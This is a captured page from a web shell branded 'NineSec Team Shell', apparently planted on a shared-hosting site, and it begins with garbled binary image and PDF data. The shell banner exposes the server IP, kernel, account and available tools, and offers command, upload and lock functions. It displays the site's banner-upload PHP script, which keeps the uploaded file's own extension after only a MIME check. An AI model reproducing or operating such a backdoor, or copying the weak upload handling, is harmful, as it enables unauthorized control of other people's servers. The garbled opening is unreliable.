JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 C  %PDF-1.3 % 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream x\mo7 a?Hyi{$E(i?ckrAvEzFHI|H?{|Z|X|Ň77?Oݞ__lOя77wx'?Ű8I] gQB2za]l|ɇ՟?} " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress
Warning: file_get_contents(test.txt): Failed to open stream: No such file or directory in /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/1770357389_0_197006009.php(44) : eval()'d code on line 6
NineSec Team Shell
NineSec Team Shell
Server IP : 82.25.113.252  /  Your IP : 216.73.216.172
Web Server : LiteSpeed
System : Linux fr-int-web2058.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u178500310 ( 178500310)
PHP Version : 8.2.29
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u178500310/domains/pinkrosesentertainment.com/public_html/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/u178500310/domains/pinkrosesentertainment.com/public_html/submit_banner.php
<?php
// Database connection
include 'db_connect.php';

// File upload directory
$uploadDir = "uploads/";
if (!is_dir($uploadDir)) {
    if (!mkdir($uploadDir, 0755, true)) {
        echo json_encode(['success' => false, 'message' => 'Failed to create upload directory']);
        exit;
    }
}

// Allowed file types and max size (2MB)
$allowedTypes = ['image/jpeg', 'image/png', 'image/gif', 'image/webp'];
$maxFileSize = 2 * 1024 * 1024; // 2MB

function uploadFile($fileInput, $uploadDir, $allowedTypes, $maxFileSize) {
    if (!isset($_FILES[$fileInput]) || $_FILES[$fileInput]['error'] == UPLOAD_ERR_NO_FILE) {
        return ['success' => false, 'message' => 'No file uploaded'];
    }

    $file = $_FILES[$fileInput];

    // Check for errors
    if ($file['error'] !== UPLOAD_ERR_OK) {
        return ['success' => false, 'message' => 'Upload error: ' . $file['error']];
    }

    // Validate file type
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mime = finfo_file($finfo, $file['tmp_name']);
    finfo_close($finfo);

    if (!in_array($mime, $allowedTypes)) {
        return ['success' => false, 'message' => 'Invalid file type. Only JPG, PNG, GIF, and WEBP are allowed.'];
    }

    // Validate file size
    if ($file['size'] > $maxFileSize) {
        return ['success' => false, 'message' => 'File too large (max 2MB)'];
    }

    // Generate unique filename
    $extension = pathinfo($file['name'], PATHINFO_EXTENSION);
    $filename = uniqid() . '.' . $extension;
    $targetPath = $uploadDir . $filename;

    if (move_uploaded_file($file['tmp_name'], $targetPath)) {
        return ['success' => true, 'path' => $targetPath];
    }

    return ['success' => false, 'message' => 'Failed to move uploaded file'];
}

// Initialize response array
$response = ['success' => false, 'message' => 'No files were uploaded'];

try {
    // Process each file upload
    $uploads = [
        'main_banner' => uploadFile('file1', $uploadDir, $allowedTypes, $maxFileSize),
        'secondary_banner' => uploadFile('file2', $uploadDir, $allowedTypes, $maxFileSize),
        'event_banner' => uploadFile('file3', $uploadDir, $allowedTypes, $maxFileSize)
    ];

    // Check if any uploads succeeded
    $anySuccess = false;
    $uploadedFiles = [];
    foreach ($uploads as $key => $upload) {
        if ($upload['success']) {
            $anySuccess = true;
            $uploadedFiles[$key] = $upload['path'];
        }
    }

    if ($anySuccess) {
        // Check if there's an existing record
        $checkSql = "SELECT id, main_banner, secondary_banner, event_banner FROM banners ORDER BY id DESC LIMIT 1";
        $result = $conn->query($checkSql);
        
        if ($result && $result->num_rows > 0) {
            // Update existing record
            $row = $result->fetch_assoc();
            
            // Prepare update statement
            $updateFields = [];
            $params = [];
            $types = '';
            
            foreach ($uploadedFiles as $key => $path) {
                $updateFields[] = "$key = ?";
                $params[] = $path;
                $types .= 's';
                
                // Delete old file if it exists
                if (!empty($row[$key]) && file_exists($row[$key])) {
                    @unlink($row[$key]);
                }
            }
            
            $params[] = $row['id'];
            $types .= 'i';
            
            $updateSql = "UPDATE banners SET " . implode(', ', $updateFields) . " WHERE id = ?";
            $stmt = $conn->prepare($updateSql);
            
            if ($stmt) {
                $stmt->bind_param($types, ...$params);
                
                if ($stmt->execute()) {
                    $response = ['success' => true, 'message' => 'Banners updated successfully'];
                } else {
                    $response = ['success' => false, 'message' => 'Database update failed: ' . $stmt->error];
                }
                $stmt->close();
            } else {
                $response = ['success' => false, 'message' => 'Database prepare failed: ' . $conn->error];
            }
        } else {
            // Insert new record with only the uploaded files (others will be NULL)
            $insertSql = "INSERT INTO banners (main_banner, secondary_banner, event_banner) VALUES (?, ?, ?)";
            $stmt = $conn->prepare($insertSql);
            
            if ($stmt) {
                $mainBanner = $uploads['main_banner']['success'] ? $uploads['main_banner']['path'] : null;
                $secondaryBanner = $uploads['secondary_banner']['success'] ? $uploads['secondary_banner']['path'] : null;
                $eventBanner = $uploads['event_banner']['success'] ? $uploads['event_banner']['path'] : null;
                
                $stmt->bind_param("sss", $mainBanner, $secondaryBanner, $eventBanner);
                
                if ($stmt->execute()) {
                    $response = ['success' => true, 'message' => 'Banners uploaded successfully'];
                } else {
                    $response = ['success' => false, 'message' => 'Database insert failed: ' . $stmt->error];
                }
                $stmt->close();
            } else {
                $response = ['success' => false, 'message' => 'Database prepare failed: ' . $conn->error];
            }
        }
    } else {
        $errorMessages = [];
        foreach ($uploads as $upload) {
            if (!$upload['success'] && $upload['message'] !== 'No file uploaded') {
                $errorMessages[] = $upload['message'];
            }
        }
        
        $response = [
            'success' => false,
            'message' => empty($errorMessages) ? 'No files were uploaded' : implode(', ', $errorMessages)
        ];
    }
} catch (Exception $e) {
    $response = ['success' => false, 'message' => 'An error occurred: ' . $e->getMessage()];
}

header('Content-Type: application/json');
echo json_encode($response);

$conn->close();
?>

NineSec Team - 2022